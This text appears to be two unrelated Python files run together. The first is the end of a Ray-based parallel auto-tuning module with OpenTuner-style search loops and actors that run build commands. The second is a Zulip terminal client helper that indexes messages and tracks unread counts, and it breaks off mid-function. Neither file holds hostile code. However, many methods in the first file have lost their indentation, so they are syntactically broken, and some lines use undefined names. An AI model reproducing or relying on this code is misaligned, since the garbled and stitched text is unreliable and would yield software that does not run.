                        return [int(_) if not "." in _ else float(_) for _ in x]
                    except: return x
            # Report datas to global database
            for d in data.values:
                d = d[1:-1]; qor = float(d[-1])
                cfg = dict([(columns[i], convert(d[i])) for i in range(len(self.params[0]))])
                self.global_report(0, 0, self._apis[0], 0, cfg, 'seed', qor)
            self._prev = len(data.values) - 1
            return len(data.values) - 1
def prune(self, api, stage, desired_result):
""" Prune away duplicate and unpromising proposals """
if self.unique(api, stage, desired_result) == True:
# use ML model pruning
if self._valid == True:
assert len(self._models) > 0, "No model available"
# generate a weighed score from the model ensemble
if self.multivoting(stage, desired_result) == True:
return True
else:
return False
# Checking if the dr is being validated
# TODO: the comparison does not work for object enum
config = desired_result.configuration.data
if config in self._pending:
return False
self._pending.append(desired_result.configuration.data)
return True
return False
# Encode enum iterm into an index number
def encode(self, key, val):
if key in self._mapping:
try:
return self._mapping[key][val]
except:
print(self._mapping, key, value)
raise RuntimeError("key error")
# Permutation type
elif isinstance(val, list):
return [val]
return val
# Async task scheduler
def async_execute(self, template=False):
self._apis = [self.create_tuning(x, 0, self.create_params())
for x in range(self.parallel)]
# Create ray actors
actors = []
for p in range(self.parallel):
name = "uptune_actor_p{}".format(p)
actor = self.cls.options(name=name).remote(p, 0, self.args)
actors.append(actor)
# user specified training data + models
self._models = self.training(self.args.learning_models)
# restore history search result
prev = self.resume()
start_time = time.time()
# the trials that have been validated
trial_num = 0
# all the trails (including running ones)
global_id_base = 0
# accumulate validation qors and report
new_qor_count = 0
# lists saving local validation qors
local_results = []
local_build_times = []
def get_config(task_list, drs):
cfgs = dict()
for index in task_list:
desired_result = None
api = self._apis[index]
while desired_result is None:
try: desired_result = api.get_next_desired_result()
except: desired_result = None
# prune and report back to opentuner database
while self.prune(api, 0, desired_result) == False:
log.warning("duplicate configuration request by %s from node %d",
desired_result.requestor,
self._apis.index(api))
desired_result = api.get_next_desired_result()
drs[index] = desired_result
cfgs[index] = desired_result.configuration.data
return drs
# distribute desired results across nodes
# check the task queue every a few mins
not_reach_limit = True
free_task_list = [ _ for _ in range(self.parallel) ]
keys = [ item[1] for item in self.params[0] ]
# objects list saves the pending tasks
objects = list()
drs = dict()
while not_reach_limit:
# Prepare inputs for free threads
# The new desired result will overwrite the old ones
drs = get_config(free_task_list, drs)
if not template:
measure_num = trial_num
if self._prev and trial_num == 0:
measure_num += (self._prev + 1)
global_id_base += (self._prev + 1)
# Prepare meta-data for searching instances
# Each thread should be assigned with a new global ID
meta = {"UT_MEASURE_NUM": measure_num,
"UT_WORK_DIR": os.path.abspath("../"),
"UT_TEMP_DIR": os.path.abspath("../ut.temp")}
self.publish(drs, stage=0, meta=meta)
# Invoke remote executors
for index in free_task_list:
target_config = drs[index].configuration.data
print(f"[ DEBUG ] GID({global_id_base}) dispatch new task on node {index}: {target_config}")
obj = actors[index].run.remote(drs[index], global_id_base)
objects.append(obj)
global_id_base += 1
free_task_list = []
# List of QoRs returned from the raylet runners
# Format [ index, {co-variates}, eval_time, QoR ]
# Check the executor pool periodically
while True:
qors, not_ready_refs = ray.wait(objects, timeout=self._interval)
objects = not_ready_refs
print("[ DEBUG ] Checking wait time", len(qors), self._interval)
if (len(qors) > 0):
new_qor_count += len(qors)
results, covars, eval_times, gids = [], [], [], []
for qor in qors:
gid, index, covar_list, eval_time, target = ray.get(qor)
print(f"[ DEBUG ] Free node #{index} (GID{gid})")
free_task_list.append(index)
eval_times.append(eval_time)
results.append(target)
covars.append(covar_list)
gids.append(gid)
# Local result logging
local_results.append(target)
local_build_times.append(eval_time)
# Report and synchronize between apis
results = [ Result(time=target) for target in results ]
count = 0
global_results_sync = dict()
for index in free_task_list:
api = self._apis[index]
dr = drs[index]
result = results[count]
build_time = eval_times[count]
covar = covars[count]
gid = gids[count]
api.report_result(dr, result)
gr = self.global_report(0, trial_num, api, index,
dr.configuration.data,
dr.requestor,
result.time)
global_results_sync[index] = gr
# Save res for causal dicovery update
vals = OrderedDict([(key, self.encode(key, dr.configuration.data[key])) for key in keys])
elapsed_time = time.time() - start_time
# Check whether prev result exist
if self._prev and trial_num == 0:
trial_num = trial_num + self._prev + 1
is_best = 1 if result.time == self.best_qors[0] else 0
df = pd.DataFrame({"gid": gid, "time" : elapsed_time, **vals, **covar,
"build_time" : build_time,
"qor" : result.time, "is_best" : is_best},
columns=["gid", "time", *keys, *covar.keys(), "build_time", "qor", "is_best"],
index=[trial_num])
header = ["gid", "time", *keys, *covar.keys(), "build_time", "qor", "is_best"]
df.to_csv(self.history, mode='a', index=False,
header=False if trial_num > 0 else header)
trial_num += 1
count += 1
# Update the new results to other nodes (apis)
for index, gr in global_results_sync.items():
api_count = 0
for api in self._apis:
if api_count != index:
api.sync([gr])
api_count += 1
break
# report local result every self.parallel qors return
if new_qor_count >= self.parallel:
new_qor_count = 0
rets = np.array(local_results)
eval_times = np.array(local_build_times)
try:
local_worst = np.nanmax(rets[rets != np.inf])
local_best = np.nanmin(rets[rets != np.inf])
except:
local_best = float("inf")
local_worst = float("inf")
max_build_time = np.nanmax(eval_times[eval_times != np.inf])
global_best = self.best_qors[0] if self.best_qors else local_best
if local_best < global_best: global_best = local_best
print("[ INFO ] {}(#{}/{})".\
format(str(datetime.timedelta(seconds=int(elapsed_time))),
trial_num, self.search_limit) + \
" - QoR LW({:05.2f})/LB({:05.2f})/GB({:05.2f}) - build time({:05.2f}s)".\
format(local_worst, local_best, global_best, max_build_time))
local_results = []
local_build_times = []
elapsed_time = time.time() - start_time
if trial_num > self.search_limit:
print(trail, self.search_limit)
not_reach_limit = False
if elapsed_time > float(self.args.timeout):
not_reach_limit = False
print(elapsed_time)
if not_reach_limit == False:
print("[ INFO ] Search ends. Global best {}".format(self.best_qors[0]))
# End of execution
for api in self._apis:
api.finish()
return self.best_config
    def main(self, template=False):
        """Synchronous search loop: dispatch self.parallel evaluations per
        epoch and wait for the whole batch before continuing.

        Returns the best configuration found.
        """
        self._apis = [self.create_tuning(x, 0, self.create_params())
                      for x in range(self.parallel)]
        # Create ray actors
        actors = []
        for p in range(self.parallel):
            name = "uptune_actor_p{}".format(p)
            actor = self.cls.options(name=name).remote(p, 0, self.args)
            actors.append(actor)
        # user specified training data + models
        self._models = self.training(self.args.learning_models)
        # restore history search result
        prev = self.resume()
        start_time = time.time()
        # the main searching loop
        for epoch in range(self.search_limit):
            drs, cfgs = list(), list()
            for api in self._apis:
                desired_result = None
                while desired_result is None:
                    try: desired_result = api.get_next_desired_result()
                    except: desired_result = None
                # prune and report back to opentuner database
                while self.prune(api, 0, desired_result) == False:
                    log.warning("duplicate configuration request by %s from node %d",
                                desired_result.requestor,
                                self._apis.index(api))
                    desired_result = api.get_next_desired_result()
                drs.append(desired_result)
                cfgs.append(desired_result.configuration.data)
            # assert and run in parallel with ray remote
            # truncate = lambda x: x + "..." if len(x) > 75 else x
            assert len(cfgs) == self.parallel, \
                "All available cfgs have been explored"
            # distribute desired results across nodes
            base = epoch * self.parallel
            if not template:
                measure_num = base
                if self._prev: measure_num += (self._prev + 1)
                meta = {"UT_MEASURE_NUM": measure_num,
                        "UT_WORK_DIR": os.path.abspath("../")}
                self.publish(drs, stage=0, meta=meta)
            objects = [ actor.run.remote(drs[actors.index(actor)])
                        for actor in actors ]
            # List of QoRs returned from the raylet runners
            # Format [ index, {co-variates}, eval_time, QoR ]
            # qors = ray.get(objects, timeout=self.args.runtime_limit+10)
            # Check the executor pool periodically (5 mins)
            interval = 5 * 60
            qors, not_ready_refs = ray.wait(objects,
                                            num_returns=self.parallel, timeout=self.args.runtime_limit)
            # Dispatch the tasks asynchronously
            results, covars, eval_times = [], [], []
            for index in range(len(objects)):
                item = objects[index]
                if item in qors:
                    # NOTE(review): this unpack rebinds the loop variable
                    # `index` to the node index returned by the actor.
                    index, covar_list, eval_time, target = ray.get(item)
                    eval_times.append(eval_time)
                    results.append(target)
                    covars.append(covar_list)
                # Cancel timeed-out tasks
                else:
                    assert item in not_ready_refs, "Not found object ref"
                    # Kill the dead actor and create a new actor
                    print("[ WARNING ] Thread #{} timed-out. Creating new actor...".format(index))
                    del actors[index]
                    new_actor = self.cls.remote(index, 0, self.args)
                    actors.insert(index, new_actor)
                    eval_times.append(float("inf"))
                    results.append(float("inf"))
                    covars.append({})
            elapsed_time = time.time() - start_time
            rets = np.array(results)
            eval_times = np.array(eval_times)
            local_worst = np.nanmax(rets[rets != np.inf])
            local_best = np.nanmin(rets[rets != np.inf])
            max_build_time = np.nanmax(eval_times[eval_times != np.inf])
            global_best = self.best_qors[0] if self.best_qors else local_best
            if local_best < global_best: global_best = local_best
            print("[ INFO ] {}(#{}/{})".\
                  format(str(datetime.timedelta(seconds=int(elapsed_time))),
                         epoch * self.parallel, self.search_limit) + \
                  " - QoR LW({:05.2f})/LB({:05.2f})/GB({:05.2f}) - build time({:05.2f}s)".\
                  format(local_worst, local_best, global_best, max_build_time))
            keys = [ item[1] for item in self.params[0] ]
            results = [ Result(time=target) for target in results ]
            for api, dr, covar, build_time, result \
                    in zip(self._apis, drs, covars, eval_times, results):
                api.report_result(dr, result)
                self.global_report(0, epoch, api,
                                   self._apis.index(api),
                                   dr.configuration.data,
                                   dr.requestor,
                                   result.time)
                # Save res for causal dicovery update
                index = base + drs.index(dr)
                vals = OrderedDict([(key, self.encode(key, dr.configuration.data[key])) for key in keys])
                # Check whether prev result exist
                if self._prev: index = index + self._prev + 1
                is_best = 1 if result.time == self.best_qors[0] else 0
                df = pd.DataFrame({"time" : elapsed_time, **vals, **covar,
                                   "build_time" : build_time,
                                   "qor" : result.time, "is_best" : is_best},
                                  columns=["time", *keys, *covar.keys(), "build_time", "qor", "is_best"],
                                  index=[index])
                header = ["time", *keys, *covar.keys(), "build_time", "qor", "is_best"]
                df.to_csv(self.history, mode='a', index=False,
                          header=False if index > 0 else header)
            for api in self._apis: # sync across nodes
                self.synchronize(0, api, self._apis.index(api), epoch)
            # update causal baysien graph
            # if epoch % 10 == 0:
            #     data = pd.read_csv('../archive.csv')
            #     data = (data-data.mean())/data.std()
            #     print(notears(data.values[:, 2:-1]))
            # time check and plot diagram
            if elapsed_time > float(self.args.timeout):
                log.info('%s runtime exceeds timeout %ds. global_best is %f',
                         str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")),
                         int(elapsed_time), self.best_qors[0])
                break
        # End of execution
        for api in self._apis:
            api.finish()
        log.info('%s tuning complete. global_best is %f',
                 str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")),
                 self.best_qors[0] if self.best_qors else float('inf'))
        return self.best_config
# Fine-grained auto-tuning control
def set_actor_cls(self, actor):
""" Set actor cls from builder and tmpl """
self.cls = actor
def create_instances(self):
""" Create single-stage api controller, ray actors and ML model instances"""
self._actors = [self.cls.remote(_, 0, self.args)
for _ in range(self.parallel)]
self._apis = [self.create_tuning(x, 0, self.create_params())
for x in range(self.parallel)]
self._models = self.training(self.args.learning_models)
def finish_tuning(self):
""" Return best configuration """
best_cfgs = [api.get_best_configuration() for api in self._apis]
for api in self._apis:
try: api.finish()
except: pass
return best_cfgs
    def generate_dr(self):
        """Single-stage: generate one desired result per node.

        NOTE(review): nodes whose tuner returns None are skipped, yet the
        assert below still demands self.parallel results -- it fires as
        soon as any api runs dry.
        """
        drs, idxs = list(), list()
        for api in self._apis:
            desired_result = api.get_next_desired_result()
            if desired_result is None:
                continue
            # keep requesting until a non-duplicate proposal is found
            while self.prune(api, 0, desired_result) == False:
                log.warning("duplicate configuration request by %s from node %d",
                            desired_result.requestor,
                            self._apis.index(api))
                desired_result = api.get_next_desired_result()
            drs.append(desired_result)
            idxs.append(self._apis.index(api))
        assert len(drs) == self.parallel, \
            "All available cfgs have been explored"
        return drs, idxs
    def rpt_and_sync(self, epoch, drs, results, mapping=None, stage=0):
        """ report and synchronize result """
        # NOTE(review): this guards on the best_qors *list* being None, not
        # on the per-stage entry -- '%f' formatting will crash if
        # best_qors[stage] itself is None.
        log.info('Global best qor %f',
                 self.best_qors[stage] if self.best_qors is not None else float('inf'))
        # optional mapping: dr -> api index, for partial batches
        idxs = tuple([mapping[_] for _ in drs]) if mapping else None
        apis = [self._apis[i] for i in idxs] if idxs else self._apis
        for api, dr, result in zip(apis, drs, results):
            api.report_result(dr, result)
            self.global_report(stage,
                               epoch,
                               api,
                               self._apis.index(api),
                               dr.configuration.data,
                               dr.requestor,
                               result.time)
        for api in self._apis:
            self.synchronize(stage, api, self._apis.index(api), epoch)
class RunProgram(object):
    """
    Ray Actor to be called by object of ParallelTuning Class
    Extending dataflow from functional programming
    Reference: https://ray.readthedocs.io/en/latest/actors.html
    """
    def __init__(self, index, stage, args=None):
        self.index = index       # node index within the parallel pool
        self.stage = stage       # tuning stage this actor serves
        self.args = args
        self.global_id = 0       # id of the trial currently running
        self.workpath = None     # per-thread work dir (set by start_run)
        self.process = None      # active subprocess handle
        self.stdout = str()
        self.stderr = str()
        self.dumper = JinjaParser()  # uptune.src.template.JinjaParser
    # Invoked by runner before starting tuning
    def start_run(self, nodes=1):
        """Claim a work directory by renaming it with an '-inuse' suffix
        and chdir into it.

        nodes == 1 assumes a single-node run using this actor's own
        temp.<index> dir; otherwise the first free numeric dir is claimed.
        NOTE(review): rename-then-chdir is not atomic across processes --
        confirm callers serialize these claims.
        """
        # Running tuning tasks in a single-node machine
        # when running across multiple compute nodes (not sharing the same FS)
        # search instances need to find available nodes
        if nodes == 1:
            self.workpath = f"temp.{self.index}"
            dir_in_use = self.workpath + '-inuse'
            if not os.path.isdir(dir_in_use):
                os.rename(self.workpath, dir_in_use)
            os.chdir(self.workpath + '-inuse')
        else:
            for folder in next(os.walk('.'))[1]:
                if folder.isdigit():
                    self.workpath = folder
                    os.rename(folder, folder + '-inuse')
                    os.chdir(folder + '-inuse')
                    break
def end_run(self):
os.chdir("../")
os.rename(self.workpath + '-inuse', self.workpath)
def set_global_id(self, global_id):
self.global_id = global_id
def call_program(self, cmd, aws=False, sample=False,
limit=None, memory_limit=None):
kwargs = dict()
subenv = os.environ.copy()
subenv["UT_TUNE_START"] = "True"
subenv["UT_CURR_INDEX"] = str(self.index)
subenv["UT_CURR_STAGE"] = str(self.stage)
subenv["UT_GLOBAL_ID"] = str(self.global_id)
# early exit in multistage & aws
if sample: subenv["UT_MULTI_STAGE_SAMPLE"] = "True"
if aws: subenv["UT_AWS_S3_BUCKET"] = "True"
if limit is float('inf'):
limit = None
if type(cmd) in (str, str):
kwargs['shell'] = True
kwargs['env'] = subenv
killed = False
t0 = time.time()
def target():
out_log = f"../stage{self.stage}_node{self.index}.out"
err_log = f"../stage{self.stage}_node{self.index}.err"
file_out = open(out_log, "a+")
file_err = open(err_log, "a+")
self.process = subprocess.Popen(
cmd, stdout=file_out, stderr=file_err,
preexec_fn=os.setsid,
**kwargs)
self.stdout, self.stderr = self.process.communicate()
thread = threading.Thread(target=target)
thread.start()
thread.join(limit)
if thread.is_alive():
killed = True
# self.process.terminate()
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
self.process.kill()
self.stdout, self.stderr = self.process.communicate()
thread.join()
t1 = time.time()
return {'time': float('inf') if killed else (t1 - t0),
'timeout': killed,
'returncode': self.process.returncode,
'stdout': self.stdout,
'stderr': self.stderr}
def run(self, dr):
raise RuntimeError("ParallelTuning.run() not implemented")
# Expr for Functional Module Reuse
class ProgramTune(ParallelTuning):
    """Concrete tuner that prepares its working directory on construction."""
    def __init__(self, cls, args, *pargs, **kwargs):
        # Zero-argument super(): the file already targets Python 3 (f-strings).
        super().__init__(cls, args, *pargs, **kwargs)
        self.prepare_workdir()
@ray.remote
class SingleProcess(RunProgram):
    def run(self, dr):
        """Toy evaluation: wait 10 seconds and return a random score in [0, 10]."""
        import random
        import time
        # time.sleep avoids forking a shell (was: os.system('sleep 10')).
        time.sleep(10)
        return random.randint(0, 10)
# Script entry point: parse uptune CLI arguments and launch the tuner,
# evaluating configurations with the SingleProcess Ray actor.
if __name__ == '__main__':
    argparser = uptune.default_argparser()
    pt = ProgramTune(SingleProcess, argparser.parse_args())
    pt.main()
|
helper.py | import os
import platform
import subprocess
import time
from collections import OrderedDict, defaultdict
from functools import wraps
from itertools import chain, combinations
from re import ASCII, MULTILINE, findall, match
from threading import Thread
from typing import (
Any, Callable, DefaultDict, Dict, FrozenSet, Iterable, List, Set, Tuple,
TypeVar, Union,
)
from urllib.parse import unquote
import lxml.html
from typing_extensions import Literal, TypedDict
# Platform detection flags, used e.g. to pick the desktop-notification command.
MACOS = platform.system() == "Darwin"
LINUX = platform.system() == "Linux"
WSL = 'microsoft' in platform.release().lower()
# Typed description of a subscribed stream, as shown in the UI panels.
StreamData = TypedDict('StreamData', {
    'name': str,
    'id': int,
    'color': str,
    'invite_only': bool,
    'description': str,
})
# One emoji: its code plus which emoji namespace it belongs to.
EmojiData = TypedDict('EmojiData', {
    'code': str,
    'type': Literal['realm_emoji', 'unicode_emoji',
                    'zulip_extra_emoji'],
})
# Mapping of emoji name -> EmojiData.
NamedEmojiData = Dict[str, EmojiData]
# Server message payload; total=False because the server omits keys that
# don't apply (e.g. stream-only fields on private messages).
Message = TypedDict('Message', {
    'id': int,
    'sender_id': int,
    'content': str,
    'recipient_id': int,
    'timestamp': int,
    'client': str,
    'subject': str,  # Only for stream msgs.
    'topic_links': List[str],
    'is_me_message': bool,
    'reactions': List[Dict[str, Any]],
    'submessages': List[Dict[str, Any]],
    'flags': List[str],
    'sender_full_name': str,
    'sender_short_name': str,
    'sender_email': str,
    'sender_realm_str': str,
    'display_recipient': Any,
    'type': str,
    'stream_id': int,  # Only for stream msgs.
    'avatar_url': str,
    'content_type': str,
    'match_content': str,  # If keyword search specified in narrow params.
    'match_subject': str,  # If keyword search specified in narrow params.
}, total=False)
# Client-side cache of everything downloaded so far, keyed by category;
# index_messages() documents a worked example of this structure.
Index = TypedDict('Index', {
    'pointer': Dict[str, Union[int, Set[None]]],  # narrow_str, message_id
    # Various sets of downloaded message ids (all, starred, ...)
    'all_msg_ids': Set[int],
    'starred_msg_ids': Set[int],
    'mentioned_msg_ids': Set[int],
    'private_msg_ids': Set[int],
    'private_msg_ids_by_user_ids': Dict[FrozenSet[int], Set[int]],
    'stream_msg_ids_by_stream_id': Dict[int, Set[int]],
    'topic_msg_ids': Dict[int, Dict[str, Set[int]]],
    # Extra cached information
    'edited_messages': Set[int],  # {message_ids, ...}
    'topics': Dict[int, List[str]],  # {topic names, ...}
    'search': Set[int],  # {message_id, ...}
    # Downloaded message data
    'messages': Dict[int, Message],  # message_id: Message
})
# Empty Index with every container pre-initialized, so lookups of
# not-yet-downloaded ids yield empty collections instead of raising.
initial_index = Index(
    pointer=defaultdict(set),
    all_msg_ids=set(),
    starred_msg_ids=set(),
    mentioned_msg_ids=set(),
    private_msg_ids=set(),
    private_msg_ids_by_user_ids=defaultdict(set),
    stream_msg_ids_by_stream_id=defaultdict(set),
    topic_msg_ids=defaultdict(dict),
    edited_messages=set(),
    topics=defaultdict(list),
    search=set(),
    # mypy bug: https://github.com/python/mypy/issues/7217
    messages=defaultdict(lambda: Message()),
)
# Aggregated unread tallies backing the counts shown next to UI buttons.
UnreadCounts = TypedDict('UnreadCounts', {
    'all_msg': int,
    'all_pms': int,
    'all_mentions': int,
    'unread_topics': Dict[Tuple[int, str], int],  # stream_id, topic
    'unread_pms': Dict[int, int],  # sender_id
    'unread_huddles': Dict[FrozenSet[int], int],  # Group pms
    'streams': Dict[int, int],  # stream_id
})
# Captions for the topic-edit propagation modes offered by the server.
edit_mode_captions = {
    'change_one': 'Change only this message topic',
    'change_later': 'Also change later messages to this topic',
    'change_all': 'Also change previous and following messages to this topic',
}
def asynch(func: Callable[..., None]) -> Callable[..., None]:
    """
    Decorator for executing a function in a separate :class:`threading.Thread`.
    """
    @wraps(func)
    def wrapper(*args: Any, **kwargs: Any) -> Any:
        # Under pytest, run synchronously so tests observe the effects
        # immediately instead of racing a daemon thread.
        if os.environ.get("PYTEST_CURRENT_TEST"):
            return func(*args, **kwargs)
        worker = Thread(target=func, args=args, kwargs=kwargs, daemon=True)
        return worker.start()
    return wrapper
def _set_count_in_model(new_count: int, changed_messages: List[Message],
                        unread_counts: UnreadCounts) -> None:
    """
    Apply `new_count` (+1 for new, -1 for read) to `unread_counts` for a
    batch of changed messages.

    This doesn't explicitly set counts in the model, but mutates
    `unread_counts` (which can update the model if it's passed in,
    but is not tied to it).
    """
    # broader unread counts (for all_*) are updated
    # later conditionally in _set_count_in_view.
    KeyT = TypeVar('KeyT')

    def bump(counts: Dict[KeyT, int], key: KeyT) -> None:
        # Existing keys are adjusted (and dropped at zero); new keys are
        # only created for incoming messages (new_count == 1).
        if key in counts:
            counts[key] += new_count
            if counts[key] == 0:
                del counts[key]
        elif new_count == 1:
            counts[key] = new_count

    for message in changed_messages:
        if message['type'] == 'stream':
            stream_id = message['stream_id']
            bump(unread_counts['unread_topics'],
                 (stream_id, message['subject']))
            bump(unread_counts['streams'], stream_id)
        elif len(message['display_recipient']) <= 2:
            # A self-pm has one display_recipient; 1-1 pms have two.
            bump(unread_counts['unread_pms'], message['sender_id'])
        else:  # group pm
            bump(unread_counts['unread_huddles'],
                 frozenset(recipient['id'] for recipient
                           in message['display_recipient']))
def _set_count_in_view(controller: Any, new_count: int,
                       changed_messages: List[Message],
                       unread_counts: UnreadCounts) -> None:
    """
    This function for the most part contains the logic for setting the
    count in the UI buttons. The later buttons (all_msg, all_pms)
    additionally set the current count in the model and make use of the
    same in the UI.
    """
    stream_buttons_log = controller.view.stream_w.log
    is_open_topic_view = controller.view.left_panel.is_in_topic_view
    if is_open_topic_view:
        topic_buttons_log = controller.view.topic_w.log
        toggled_stream_id = controller.view.topic_w.stream_button.stream_id
    user_buttons_log = controller.view.user_w.log
    all_msg = controller.view.home_button
    all_pm = controller.view.pm_button
    all_mentioned = controller.view.mentioned_button
    for message in changed_messages:
        user_id = message['sender_id']
        # If we sent this message, don't increase the count
        if user_id == controller.model.user_id:
            continue
        msg_type = message['type']
        # Whether the message also counts toward the broad 'all_msg' total;
        # cleared below for muted streams and muted topics.
        add_to_counts = True
        if 'mentioned' in message['flags']:
            unread_counts['all_mentions'] += new_count
            all_mentioned.update_count(unread_counts['all_mentions'])
        if msg_type == 'stream':
            stream_id = message['stream_id']
            msg_topic = message['subject']
            if controller.model.is_muted_stream(stream_id):
                add_to_counts = False  # if muted, don't add to eg. all_msg
            else:
                # Bump the count on the matching stream button only.
                for stream_button in stream_buttons_log:
                    if stream_button.stream_id == stream_id:
                        stream_button.update_count(stream_button.count
                                                   + new_count)
                        break
            # FIXME: Update unread_counts['unread_topics']?
            if controller.model.is_muted_topic(stream_id, msg_topic):
                add_to_counts = False
            if is_open_topic_view and stream_id == toggled_stream_id:
                # If topic_view is open for incoming messages's stream,
                # We update the respective TopicButton count accordingly.
                for topic_button in topic_buttons_log:
                    if topic_button.topic_name == msg_topic:
                        topic_button.update_count(topic_button.count
                                                  + new_count)
        else:
            # Private message: bump the sender's user button and all_pms.
            for user_button in user_buttons_log:
                if user_button.user_id == user_id:
                    user_button.update_count(user_button.count + new_count)
                    break
            unread_counts['all_pms'] += new_count
            all_pm.update_count(unread_counts['all_pms'])
        if add_to_counts:
            unread_counts['all_msg'] += new_count
            all_msg.update_count(unread_counts['all_msg'])
def set_count(id_list: List[int], controller: Any, new_count: int) -> None:
    """Apply new_count (+1 new message / -1 read) for the given message ids,
    updating both the model's unread counts and the UI buttons."""
    # (we could ensure this in a different way by a different type)
    assert new_count in (1, -1)
    messages = controller.model.index['messages']
    unread_counts = controller.model.unread_counts  # type: UnreadCounts
    changed_messages = [messages[message_id] for message_id in id_list]
    _set_count_in_model(new_count, changed_messages, unread_counts)
    # The view may not be loaded yet — usually when the very first message
    # is read — so poll until it appears.
    while not hasattr(controller, 'view'):
        time.sleep(0.1)
    _set_count_in_view(controller, new_count, changed_messages, unread_counts)
    while not hasattr(controller, 'loop'):
        time.sleep(0.1)
    controller.update_screen()
def index_messages(messages: List[Message],
                   model: Any,
                   index: Index) -> Index:
    """
    Update `index` in place from a batch of downloaded messages, filing
    each message id into the sets matching the model's current narrow.

    STRUCTURE OF INDEX
    {
        'pointer': {
            '[]': 30  # str(ZulipModel.narrow)
            '[["stream", "verona"]]': 32,
            ...
        }
        'topic_msg_ids': {
            123: {    # stream_id
                'topic name': {
                    51234,  # message id
                    56454,
                    ...
                }
            },
        'private_msg_ids_by_user_ids': {
            (3, 7): {  # user_ids frozenset
                51234,
                56454,
                ...
            },
            (1, 2, 3, 4): {  # multiple recipients
                12345,
                32553,
            }
        },
        'topics': {
            123: [    # stream_id
                'Denmark2',  # topic name
                'Verona2',
                ....
            ]
        },
        'all_msg_ids': {
            14231,
            23423,
            ...
        },
        'private_msg_ids': {
            22334,
            23423,
            ...
        },
        'mentioned_msg_ids': {
            14423,
            33234,
            ...
        },
        'stream_msg_ids_by_stream_id': {
            123: {
                53434,
                36435,
                ...
            }
            234: {
                23423,
                23423,
                ...
            }
        },
        'edited_messages':{
            51234,
            23423,
            ...
        },
        'search': {
            13242,
            23423,
            23423,
            ...
        },
        'messages': {
            # all the messages mapped to their id
            # for easy retrieval of message from id
            45645: {  # PRIVATE
                'id': 4290,
                'timestamp': 1521817473,
                'content': 'Hi @**Cordelia Lear**',
                'sender_full_name': 'Iago',
                'flags': [],
                'sender_short_name': 'iago',
                'sender_email': 'iago@zulip.com',
                'subject': '',
                'subject_links': [],
                'sender_id': 73,
                'type': 'private',
                'recipient_id': 124,
                'reactions': [],
                'display_recipient': [
                    {
                        'email': 'ZOE@zulip.com',
                        'id': 70,
                        'full_name': 'Zoe',
                    }, {
                        'email': 'cordelia@zulip.com',
                        'id': 71,
                        'full_name': 'Cordelia Lear',
                    }, {
                        'email': 'hamlet@zulip.com',
                        'id': 72,
                        'full_name': 'King Hamlet',
                    }, {
                        'email': 'iago@zulip.com',
                        'id': 73,
                        'full_name': 'Iago',
                    }
                ]
            },
            45645: {  # STREAM
                'timestamp': 1521863062,
                'sender_id': 72,
                'sender_full_name': 'King Hamlet',
                'recipient_id': 119,
                'content': 'https://github.com/zulip/zulip-terminal',
                'type': 'stream',
                'sender_email': 'hamlet@zulip.com',
                'id': 4298,
                'display_recipient': 'Verona',
                'flags': [],
                'reactions': [],
                'subject': 'Verona2',
                'stream_id': 32,
            },
        },
    }
    """
    narrow = model.narrow
    for msg in messages:
        if 'edit_history' in msg.keys():
            index['edited_messages'].add(msg['id'])
        # Every message is cached by id regardless of the narrow.
        index['messages'][msg['id']] = msg
        if not narrow:
            index['all_msg_ids'].add(msg['id'])
        elif model.is_search_narrow():
            # Search results are filed only under 'search'.
            index['search'].add(msg['id'])
            continue
        # Single-term narrows: starred / mentioned / pm-related sets.
        if len(narrow) == 1:
            if narrow[0][1] == 'starred':
                if 'starred' in msg['flags']:
                    index['starred_msg_ids'].add(msg['id'])
            if narrow[0][1] == 'mentioned':
                if 'mentioned' in msg['flags']:
                    index['mentioned_msg_ids'].add(msg['id'])
            if msg['type'] == 'private':
                index['private_msg_ids'].add(msg['id'])
                recipients = frozenset({
                    recipient['id'] for recipient in msg['display_recipient']
                })
                if narrow[0][0] == 'pm_with':
                    # The conversation key is the frozenset of all
                    # participant ids, including our own.
                    narrow_emails = ([model.user_dict[email]['user_id']
                                      for email in narrow[0][1].split(', ')]
                                     + [model.user_id])
                    if recipients == frozenset(narrow_emails):
                        (index['private_msg_ids_by_user_ids'][recipients]
                         .add(msg['id']))
        if msg['type'] == 'stream' and msg['stream_id'] == model.stream_id:
            (index['stream_msg_ids_by_stream_id'][msg['stream_id']]
             .add(msg['id']))
        # Two-term narrow of the form [stream, topic].
        if (msg['type'] == 'stream' and len(narrow) == 2
                and narrow[1][1] == msg['subject']):
            topics_in_stream = index['topic_msg_ids'][msg['stream_id']]
            if not topics_in_stream.get(msg['subject']):
                topics_in_stream[msg['subject']] = set()
            topics_in_stream[msg['subject']].add(msg['id'])
    return index
def classify_unread_counts(model: Any) -> UnreadCounts:
    """
    Build an UnreadCounts summary from the server's initial unread data.

    Unsubscribed streams and muted topics are skipped entirely; muted
    streams still get per-stream counts but don't add to 'all_msg'.
    """
    # TODO: support group pms
    unread_msg_counts = model.initial_data['unread_msgs']
    unread_counts = UnreadCounts(
        all_msg=0,
        all_pms=0,
        all_mentions=0,
        unread_topics=dict(),
        unread_pms=dict(),
        unread_huddles=dict(),
        streams=defaultdict(int),
    )
    unread_counts['all_mentions'] += len(unread_msg_counts['mentions'])
    for pm in unread_msg_counts['pms']:
        count = len(pm['unread_message_ids'])
        unread_counts['unread_pms'][pm['sender_id']] = count
        unread_counts['all_msg'] += count
        unread_counts['all_pms'] += count
    for stream in unread_msg_counts['streams']:
        count = len(stream['unread_message_ids'])
        stream_id = stream['stream_id']
        # unsubscribed streams may be in raw unreads, but are not tracked
        if not model.is_user_subscribed_to_stream(stream_id):
            continue
        if model.is_muted_topic(stream_id, stream['topic']):
            continue
        unread_counts['unread_topics'][(stream_id, stream['topic'])] = count
        # 'streams' is a defaultdict(int): missing ids start at 0, so a plain
        # += replaces the original's redundant get()/else branching.
        unread_counts['streams'][stream_id] += count
        if stream_id not in model.muted_streams:
            unread_counts['all_msg'] += count
    # store unread count of group pms in `unread_huddles`
    for group_pm in unread_msg_counts['huddles']:
        count = len(group_pm['unread_message_ids'])
        user_ids = frozenset(map(int, group_pm['user_ids_string'].split(',')))
        unread_counts['unread_huddles'][user_ids] = count
        unread_counts['all_msg'] += count
        unread_counts['all_pms'] += count
    return unread_counts
def match_user(user: Any, text: str) -> bool:
    """
    Matches if the user full name, any part of the name, or the email
    starts with `text` (case insensitive).
    """
    needle = text.lower()
    full_name = user['full_name'].lower()
    # Individual name words, plus the full name (which helps in further
